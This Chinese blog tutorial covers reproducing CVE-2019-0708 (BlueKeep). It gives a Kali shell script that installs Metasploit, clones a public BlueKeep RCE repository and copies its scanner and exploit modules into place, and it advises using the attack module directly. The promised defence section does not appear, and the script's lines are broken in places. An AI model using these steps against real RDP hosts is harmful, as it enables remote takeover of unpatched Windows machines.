CVE-2019-0708复现和防御手段是什么

发布时间：2021-12-22 21:02:31 作者：柒染
来源：亿速云阅读：191

CVE-2019-0708复现和防御手段是什么，很多新手对此不是很清楚，为了帮助大家解决这个难题，下面小编将为大家详细讲解，有这方面需求的人可以来学习下，希望你能有所收获。

一、漏洞描述

Windows系列服务器于2019年5月15号，被爆出高危漏洞，该漏洞影响范围较广如：windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击，该服务器漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击的。

二、漏洞利用方法

为了测试方便，直接扔出自编的一个脚本，按下面步骤做就可以，使用kali linxu系统。

1. 建立一个脚本文件*.sh，同时chmod +x *.sh付给它可执行属性

2. 直接复制如下代码到*.sh，然后./*.sh运行即可准备好攻击环境（注意：脚本帮助更新了MSF，这一步是必须的！不然框架加载不进来）

#Update your MSF
apt-get update
apt-get install
metasploit-framework
#Download cve-2019-0708
git clone https://github.com/NAXG/cve_2019_0708_bluekeep_rce.git
#Mkdir for cve
mkdir –p /usr/share/metasploit-framework/lib/msf/core/exploit/
mkdir –p
/usr/share/metasploit-framework/modules/auxiliary/scanner/
mkdir –p
/usr/share/metasploit-framework/modules/exploits/windows/rdp/
mkdir –p
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
#Copy .rb to target dir
cd cve_2019_0708_bluekeep_rce/
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

CVE-2019-0708下载后包含2个模块，一个扫描模块cve_2019_0708_bluekeep，一个攻击模块cve_2019_0708_bluekeep_rce，直接使用攻击模块就可以。

CVE-2019-0708复现和防御手段是什么